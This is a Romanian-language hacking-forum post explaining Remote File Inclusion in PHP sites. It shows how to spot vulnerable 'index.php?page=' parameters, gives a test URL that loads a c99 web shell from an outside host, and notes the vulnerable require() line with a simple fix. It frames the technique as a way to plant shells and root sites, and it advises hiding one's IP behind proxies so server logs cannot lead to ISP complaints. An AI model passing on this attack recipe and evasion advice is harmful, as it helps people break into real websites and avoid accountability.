Jump to content
Zero_Cool666

Despre RFI [Folosire si reparare]

Recommended Posts

RFI = Remote File Inclusion

LFI = Local File Inclusion

Cu aceasta vulnerabilitate, puteti introduce un shell, sau un script php intr-un anumit site vulnerabil.

Deobicei, cei care folosesc RFI, uploadeaza un shell sau NetCat (pentru a roota site-ul).

Acum o sa va explic cum sta treaba cu RFI-ul.

Cum puteti sa va dati seama ca un site ar putea fi vulnerabil la rfi ?

Foarte Simplu, Vulnerabilitatea se afla in index.php?page= sau etc.Sunt diferite pagini.De ex. mai exista si index.php?path=, etc.

Un site Vulnerabil la RFI ar trebui sa arate cam asa :

http://www.yoursite.com/index.php?page=

Pentru a testa manual daca site-ul este vulnerabil la RFI :

http://www.yoursite.com/index.php?page=[evil_shell]

[evil_shell] = Calea (Path-ul) Catre Shell.De exemplu http://shockingsoft.uv.ro/c99.txt

In fisierul PHP, vulnerabilitatea este :

require($page . “pagina.php”);

Repararea bug-ului este :

require(”pagina.php”);

HINT 1 : Nu este vorba de host, este vorba de scriptul PHP

HINT 2 : Ar fi bine sa va ascundeti IP-ul cu Proxy, Hide IP Platinium sau AOL.

De ce ?

Pentru ca log-uriile sa salveaza pe server, in log arata absolut ce face fiecare user, chiar daca intri pe index.php, in log scrie.Si dupaia puteti fi reclamat la ISP, etc.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...